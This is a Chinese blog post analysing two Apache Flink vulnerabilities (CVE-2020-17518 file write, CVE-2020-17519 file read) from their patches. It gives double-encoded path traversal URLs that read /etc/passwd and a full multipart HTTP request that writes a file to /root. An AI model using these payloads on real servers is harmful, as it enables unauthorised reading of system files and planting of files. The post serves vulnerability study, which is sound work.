flink读取不到文件_Flink 任意文件读取和写入

最新推荐文章于 2022-07-28 20:00:14 发布
最新推荐文章于 2022-07-28 20:00:14 发布
阅读量2.9k 收藏
点赞数
文章标签: flink读取不到文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32823555/article/details/113384851
版权
本文分析了 Apache Flink 的两个安全漏洞,包括任意文件读取和写入。通过补丁代码展示了漏洞利用的可能性,并详细说明了如何通过特定的请求payload来触发这些漏洞。此外,还介绍了如何设置环境进行漏洞分析,以及构造PoC来演示文件读写操作。
摘要由CSDN通过智能技术生成

Flink 任意文件读取和写入

一、前言

Apache Flink 两个高危漏洞(CVE-2020-17518&CVE-2020-17519),分别是任意文件写入和任意文件读取.

二、commit 分析

原代码

String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);

补丁

String filename = new File(handlerRequest.getPathParameter(LogFileNamePathParameter.class)).getName();

通过补丁代码,粗略知道handlerRequest变量可控, 能够实现任意文件读取.

原代码

final Path dest = currentUploadDir.resolve(new File(fileUpload.getFilename()).getName());

fileUpload.renameTo(dest.toFile());

补丁

final Path dest = currentUploadDir.resolve(new File(fileUpload.getFilename()).getName()); fileUpload.renameTo(dest.toFile());

通过补丁代码, 粗略知道fileUpload变量可控, 能够实现任意文件写入.

三、服务搭建 & 路由信息获取

服务搭建

1、下载包flink

2、开启 jdwp 端口

修改 cong/flink-conf.yaml 文件,增加

env.java.opts.jobmanager: "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8006"

3、IntelliJ IDEA 打开第一步中的项目, 编辑远程调试配置

路由信息获取

访问 Flink Web UI, 访问页面, 让页面报错. 我这里通过上传一个非 jar 文件使项目报错, 然后获取日志, 看日志中异常信息

ERROR org.apache.flink.runtime.webmonitor.handlers.JarUploadHandler [] - Exception occurred in REST handler: Only Jar files are

allowed.

然后在 org.apache.flink.runtime.webmonitor.handlers.JarUploadHandler 下断点, 重新上传 jar 包. 再次访问时, 能成功触发断点. 通过调用栈, 找到该项目的路由类和路由变量.

四、漏洞分析

1、任意文件读取

通过上面获取到的路由变量, 在 get 方法请求中找到 JobManagerCustomLogHandler 这个处理类. 然后根据 pattern 获取到 JobManagerCustomLogHandler 能处理 v1/jobmanager/logs/:filename 和 jobmanager/logs/:filename 两种请求. 通过分析, filename可控, 并且对变量值做了两次url解码. 所以最终的payload有

http://ip:8081/v1/jobmanager/logs/..%252f..%252f..%252f..%252fetc%252fpasswd

http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252fetc%252fpasswd

2、任意文件写入

任意文件写入触发类是 org.apache.flink.runtime.rest.FileUploadHandler, 该类调用发生在路由解析之前, 而且filename可控

DiskFileUpload fileUpload = (DiskFileUpload)data;

Preconditions.checkState(fileUpload.isCompleted());

Path dest = this.currentUploadDir.resolve(fileUpload.getFilename());

fileUpload.renameTo(dest.toFile());

LOG.trace("Upload of file {} complete.", fileUpload.getFilename());

fileUpload 会先在 /tmp 目录下缓存文件, 然后再通过 filename 将文件移动. 所以构造 poc 如下:

POST /test HTTP/1.1

Host: ip:8081

Content-Length: 208

Accept: application/json, text/plain, */*

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryw6W3L7dPchtqPO4f

Origin: http://ip:8081

Referer: http://ip:8081/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

------WebKitFormBoundaryw6W3L7dPchtqPO4f

Content-Disposition: form-data; name="xxxx"; filename="/root/test123"

Content-Type: application/octet-stream

test123

------WebKitFormBoundaryw6W3L7dPchtqPO4f--

然后我们会在 /root/ 目录下找到 test123 文件. 至于文件上传处理为什么放在路由处理之前, 有一点存疑

参考

姜饼人儿
关注
Flink奇葩问题(1) yarn-session模式下找不到自定义jar包中的类路径
yfqfy的专栏
03-18 2830
问题描述: 任务能够提交成功,但是点击错误任务直接跳出错误窗口,任务日志不显示,错误如下:
flink 读取文件数据写入ElasticSearch
congge_study的博客
11-14 9052
flink读取文件数据写到elasticsearch
三.文件系统
John的博客
09-19 154
1. 文件系统介绍 一.目录和文件 1.获取文件属性:stat,fstat,lstat 2.文件访问权限:st_mode 3.umask 4.文件权限的更改/管理 5.粘住位 6.文件系统是什么东西:FAT,UFS 7.硬链接,符号链接 8.utime 9.目录的创建和销毁 10.更改当前工作路径 11.分析目录/读取目录内容 二.系统的数据文件和信息 三.进程环境 2.stat 功能:These functions return information about a file, in the b
Numpy学习06-输入输出
sunny_1219的博客
11-23 278
Numpy学习06-输入输出Numpy二进制文件文件形式保存、加载方式文本文件文本格式选项作业解答完结 Numpy二进制文件 文件形式 npy:二进制的方式存储文件,第一行以文本形式保存元信息(ndim,dtype,shape等)。 npz:以压缩打包的方式存储文件。 保存、加载方式 save():关键字参数为数组起名字,非关键字参数传递的数组会自动起名为arr_0, arr_1, … savez():输出的是一个压缩文件(扩展名为npz),其中每个文件都是一个save()保存的npy文件文件名对应
Flink上传集群报错可能的原因
weixin_45316851的博客
04-03 2055
原因一:版本问题 查看pom文件中的依赖版本是否与集群一致,不一致可能报错! org.apache.flink.client.program.ProgramInvocationException: Job failed. (JobID: 47e155c0fadbbb11c20c3b8d00bdcef8) at org.apache.flink.client.program.rest...
Apache Flink目录遍历漏洞(REST API读/写远程文件
crowsec
02-10 1435
CVE-2020-17518复现
flink读取不到文件_Flink开发遇到的问题汇总-
weixin_33344629的博客
01-17 3402
1,提交的离线任务完成之后,在一段时间后web端没有显示或者说自动消失: 原因分析:https://blog.csdn.net/u013076044/article/details/104740792是需要开启historyserver2,Flink读取hdfs的(hive分区)文件,目前已知有三种方式:通过循环union方式,本地可以执行,集群提交报错 通过官方API,可是只支持csv文件格式,...
flink 写入到es_scala Flink读取kafka 写入es(elasticsearch) 简单实现
weixin_39669982的博客
12-31 885
scala Flink读取kafka 写入elasticsearch 简单实现引入pom依赖es的Mapping读取kafka 写入es 代码实现scala 构建kafka生产者scala 构建kafka消费者引入pom依赖org.apache.kafkakafka_2.111.1.0org.apache.kafkakafka-clients1.1.0org.apache.flinkflink-c...
flink读kafka写入mysql_Flink 1.9 实战:使用 SQL 读取 Kafka 并写入 MySQL
weixin_31361715的博客
01-19 308
上周六在深圳分享了《Flink SQL 1.9.0 技术内幕和最佳实践》,会后许多小伙伴对最后演示环节的 Demo 代码非常感兴趣,迫不及待地想尝试下,所以写了这篇文章分享下这份代码。希望对于 Flink SQL 的初学者能有所帮助。完整分享可以观看 Meetup 视频回顾 :https://developer.aliyun.com/live/1416这份代码主要由两部分组成:1) 能用来提交 S...
flink_exporter:适用于Prometheus的Apache Flink导出器
05-01
适用于导出器。 出口指标 ... 读取/写入字节和记录 flink_read_bytes flink_read_records flink_write_bytes flink_write_records flink_read_bytes_total flink_read_records_total flink_w
Apache Flink任意文件读取和远程文件写入漏洞
谢公子的博客
01-14 1720
目录 漏洞描述 漏洞影响版本 漏洞复现 任意文件读取 任意文件写入 修复建议 漏洞描述 Flink 在 1.5.1 版本中引入了一个 REST handler,这允许攻击者将已上传的文件写入本地任意位置的文件中,并且可通过恶意修改的 HTTP 头将这些文件写入Flink 1.5.1 可以访问的任意位置。 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口使用 ../../ 进...
写入文件_烽火狼烟丨Apache Flink任意文件读取和远程文件写入漏洞风险提示
weixin_30334225的博客
01-12 212
Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和管道方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行。Apache Flink 1.5.1引入了REST接口,该接口存在多处缺陷,导致了目录遍历和任意文件写入漏...
python找不到txt_python-FileNotFoundException:文件文件:/path/to/File/英寸.txt不存在,或者运行Flink的用户没有足够的权限访问它...
weixin_39965283的博客
11-24 229
[...]if __name__ == "__main__":env = get_environment()input_file = 'file:///workfile.txt/'if len(sys.argv) != 1 and len(sys.argv) != 3:sys.exit("Usage: ./bin/pyflink.sh WordCount[ - ]")if len(sys.arg...
flink配置historyserver
那又怎样?的博客
12-05 3982
flink版本1.9.1 1.编辑flink/conf/flink-conf.yaml ,搜索history,主要编辑如下 #============================================================================== # HistoryServer #======================================...
Apache Flink -任意文件写入漏洞(CVE-2020-17518)
chaojixiaojingang
01-07 4151
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
tomcat源码分析_CVE-2020-9484 tomcat session反序列化漏洞分析
weixin_39839162的博客
11-27 241
作者:N1gh5合天智汇title: CVE-2020-9484 tomcat session反序列化漏洞分析 tags: CVE,Tomcat,反序列化 grammar_cjkRuby: true本文借助CVE-2020-9484 Tomcat漏洞详细的介绍了本地和远程调试Tomcat 源码。分析漏洞成因以及补丁修补情况,以及分析ysoserial反序列化链。0x01 漏洞简介Apache To...
Flink问题集合
qq_42057890的博客
10-11 3574
问题集合及解决方法: 问题1:org.apache.flink.runtime.rest.handler.job.JobDetailsHandler =Exception occurred in REST handler: Job 2b4f67d9aa2529b16b8ed65646a49618 not found 问题原因:由于该job已经不再执行但是页面仍处于打开状态,故会出现该日志。 解决方法:关闭该job详情的页面即可。 ...
FlinkSQL报错:org.apache.flink.util.FlinkException: Could not upload job files.
yuchendejiyi的博客
03-31 6744
1、首先我使用的Flink版本 Flink1.12.0 2、出现错误场景 在进行Flink和Hive(3.1.2)版本进行集成,通过sql-client.sh embedded来执行(select * from emp)语句时出现此错误信息 ---> 报错信息 ---> 分析 org.apache.flink.util.FlinkException: Could not upload job files 这个错误较为笼统,根据这个定位会很模糊,值得注意的是下面的报错: 20
Apache Fink 文件上传漏洞复现及利用
Tauil的博客
07-28 1023
其它不修改,然后点击发送,因为该版本的ApacheFlink中存在有一个目录穿越漏洞,详细内容在。一个数据包,数据包中的文件,右键点击重发,然后可以看到数据包中内容。应该就是文件的名称,其创建文件的路径猜测是其默认文件路径的。boundary是分隔符,不用关注,查看到其。处进行检查或者强制规定的路径,而是使用类似。这样的直接创建文件的命令,我们可以通过修改。,我们可以使用该漏洞查看我们创建的内容。,所以猜测该网页文件地址应该是在。的效果,所以我们修改消息体内容为。查看网络数据包,然后上传任意文件。.....
flink 读取本地文件写入本地文件
最新发布
06-07
好的,下面是使用 Flink 读取本地文件写入本地文件的示例代码。 首先,需要引入 Flink 相关依赖: ```scala libraryDependencies += "org.apache.flink" %% "flink-scala" % "1.13.0" libraryDependencies += ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值